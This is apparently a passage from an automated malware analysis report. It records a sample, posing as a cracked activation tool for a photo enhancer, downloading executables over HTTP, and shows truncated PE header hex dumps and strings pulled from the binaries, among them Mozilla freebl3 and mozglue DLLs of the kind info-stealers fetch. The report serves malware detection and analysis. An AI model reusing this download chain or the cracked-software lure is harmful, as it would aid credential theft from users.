00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.14.0 (Ubuntu)Date: Fri, 05 Aug 2022 11:54:17 GMTContent-Type: application/octet-streamContent-Length: 80128Connection: keep-aliveLast-Modified: Sat, 28 May 2022 16:52:46 GMTETag: "6292535e-13900"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 95 28 c1 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 74 28 02 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 00 3f 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.14.0 (Ubuntu)Date: Fri, 05 Aug 2022 11:54:18 GMTContent-Type: application/octet-streamContent-Length: 627128Connection: keep-aliveLast-Modified: Mon, 11 Apr 2022 14:39:36 GMTETag: "62543da8-991b8"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 d4 f1 39 62 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 18 08 00 00 56 01 00 00 00 00 00 b0 2f 04 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 09 00 00 04 00 00 ed ee 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 ad bc 08 00 63 51 00 00 10 0e 09 00 2c 01 00 00 00 70 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 72 09 00 b8 1f 00 00 00 80 09 00 34 43 00 00 1c b0 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1c 57 08 00 18 00 00 00 68 30 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 13 09 00 d8 03 00 00 90 b7 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d1 16 08 00 00 10 00 00 00 18 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 9c ff 00 00 00 30 08 00 00 00 01 00 00 1c 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 b8 1c 00 00 00 30 09 00 00 04 00 00 00 1c 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 50 09 00 00 02 00 00 00 20 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 60 09 00 00 02 00 00 00 22 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 70 09 00 00 0a 00 00 00 24 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 34 43 00 00 00 80 09 00 00 44 00 00 00 2e 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.14.0 (Ubuntu)Date: Fri, 05 Aug 2022 11:54:19 GMTContent-Type: application/octet-streamContent-Length: 684984Connection: keep-aliveLast-Modified: Mon, 11 Apr 2022 14:40:08 GMTETag: "62543dc8-a73b8"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 26 f2 39 62 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 1a 08 00 00 36 02 00 00 00 00 00 b0 1f 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 e0 0a 00 00 04 00 00 e9 81 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 34 2c 0a 00 53 00 00 00 87 2c 0a 00 c8 00 00 00 00 a0 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 54 0a 00 b8 1f 00 00 00 b0 0a 00 38 24 00 00 84 26 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 30 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 94 2e 0a 00 44 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d5 19 08 00 00 10 00 00 00 1a 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 30 08 00 00 08 02 00 00 1e 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 40 0a 00 00 02 00 00 00 26 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 90 0a 00 00 02 00 00 00 28 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 a0 0a 00 00 04 00 00 00 2a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 38 24 00 00 00 b0 0a 00 00 26 00 00 00 2e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.14.0 (Ubuntu)Date: Fri, 05 Aug 2022 11:54:20 GMTContent-Type: application/octet-streamContent-Length: 254392Connection: keep-aliveLast-Modified: Mon, 11 Apr 2022 14:39:58 GMTETag: "62543dbe-3e1b8"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 27 f2 39 62 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f2 00 00 00 00 00 00 80 ce 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 a1 de 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 74 76 03 00 53 01 00 00 c7 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c2 03 00 b8 1f 00 00 00 c0 03 00 98 35 00 00 68 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 44 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 56 ca 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 04 ac 00 00 00 e0 02 00 00 ae 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 88 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 98 35 00 00 00 c0 03 00 00 36 00 00 00 8c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.14.0 (Ubuntu)Date: Fri, 05 Aug 2022 11:54:23 GMTContent-Type: application/octet-streamContent-Length: 1099223Connection: keep-aliveLast-Modified: Mon, 11 Apr 2022 12:28:56 GMTETag: "62541f08-10c5d7"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 22 a9 2c 62 00 76 0e 00 b2 13 00 00 e0 00 06 21 0b 01 02 19 00 0c 0b 00 00 fa 0c 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 20 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 10 0f 00 00 06 00 00 c8 9d 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 b0 0c 00 6e 2a 00 00 00 e0 0c 00 d0 0c 00 00 00 10 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 0d 00 e0 3b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c e2 0c 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ac 0a 0b 00 00 10 00 00 00 0c 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 20 0b 00 00 28 00 00 00 12 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 10 44 01 00 00 50 0b 00 00 46 01 00 00 3a 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 a0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 6e 2a 00 00 00 b0 0c 00 00 2c 00 00 00 80 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 e0 0c 00 00 0e 00 00 00 ac 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 f0 0c 00 00 02 00 00 00 ba 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 00 0d 00 00 02 00 00 00 bc 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 10 0d 00 00 06 00 00 00 be 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 e0 3b 00 00 00 20 0d 00 00 3c 00 00 00 c4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 60 0d 00 00 06 00 00 00 00 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 70 0d 00 00 ca 00 00 00 06 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 40 0e 00 00 28 00 00 00 d0 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00

Source: freebl3.dll.16.dr, mozglue.dll.16.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: freebl3.dll.16.dr, mozglue.dll.16.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: freebl3.dll.16.dr, mozglue.dll.16.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: freebl3.dll.16.dr, mozglue.dll.16.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: freebl3.dll.16.dr, mozglue.dll.16.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: freebl3.dll.16.dr, mozglue.dll.16.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: freebl3.dll.16.dr, mozglue.dll.16.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: freebl3.dll.16.dr, mozglue.dll.16.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: freebl3.dll.16.dr, mozglue.dll.16.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: freebl3.dll.16.dr, mozglue.dll.16.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: freebl3.dll.16.dr, mozglue.dll.16.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: freebl3.dll.16.dr, mozglue.dll.16.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: freebl3.dll.16.dr, mozglue.dll.16.dr	String found in binary or memory: http://ocsp.digicert.com0O
Source: freebl3.dll.16.dr, mozglue.dll.16.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp, 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp	String found in binary or memory: http://www.innosetup.com/
Source: A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe, A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe, 00000015.00000000.459336953.0000000000401000.00000020.00000001.01000000.00000009.sdmp	String found in binary or memory: http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdline
Source: A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe, 00000015.00000000.459336953.0000000000401000.00000020.00000001.01000000.00000009.sdmp	String found in binary or memory: http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
Source: 2.0.0-beta2.cps.exe, 00000010.00000002.511072689.000000006D833000.00000002.00000001.01000000.0000000F.sdmp, mozglue.dll.16.dr	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe, 00000015.00000002.500341055.00000000021D0000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe, 00000015.00000003.461402961.00000000023F0000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe, 00000015.00000003.462132766.00000000021C4000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp, 00000016.00000002.503593390.0000000002257000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp, 00000016.00000003.470482188.000000000225C000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp, 00000016.00000003.469376595.00000000031B0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.palkornel.hu/innosetup
Source: A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe, 00000015.00000002.500341055.00000000021D0000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe, 00000015.00000003.461402961.00000000023F0000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe, 00000015.00000003.462132766.00000000021C4000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp, 00000016.00000002.503593390.0000000002257000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp, 00000016.00000003.470482188.000000000225C000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp, 00000016.00000003.469376595.00000000031B0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.palkornel.hu/innosetup%1
Source: A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe, 00000015.00000003.463131309.00000000024F0000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe, 00000015.00000003.464570142.00000000023F0000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp, 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp	String found in binary or memory: http://www.remobjects.com/ps
Source: A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe, 00000015.00000003.463131309.00000000024F0000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe, 00000015.00000003.464570142.00000000023F0000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp, 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp	String found in binary or memory: http://www.remobjects.com/psU
Source: 2.0.0-beta2.cps.exe, 00000010.00000002.510333215.0000000061ED1000.00000008.00000001.01000000.0000000E.sdmp	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: freebl3.dll.16.dr, mozglue.dll.16.dr	String found in binary or memory: https://mozilla.org0
Source: freebl3.dll.16.dr, mozglue.dll.16.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe, 00000015.00000002.500341055.00000000021D0000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe, 00000015.00000003.461402961.00000000023F0000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe, 00000015.00000003.462132766.00000000021C4000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp, 00000016.00000002.503593390.0000000002257000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp, 00000016.00000002.503570926.0000000002250000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp, 00000016.00000003.470482188.000000000225C000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp, 00000016.00000003.469376595.00000000031B0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.mediachance.com/
Source: A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp, 00000016.00000002.503570926.0000000002250000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.mediachance.com/&
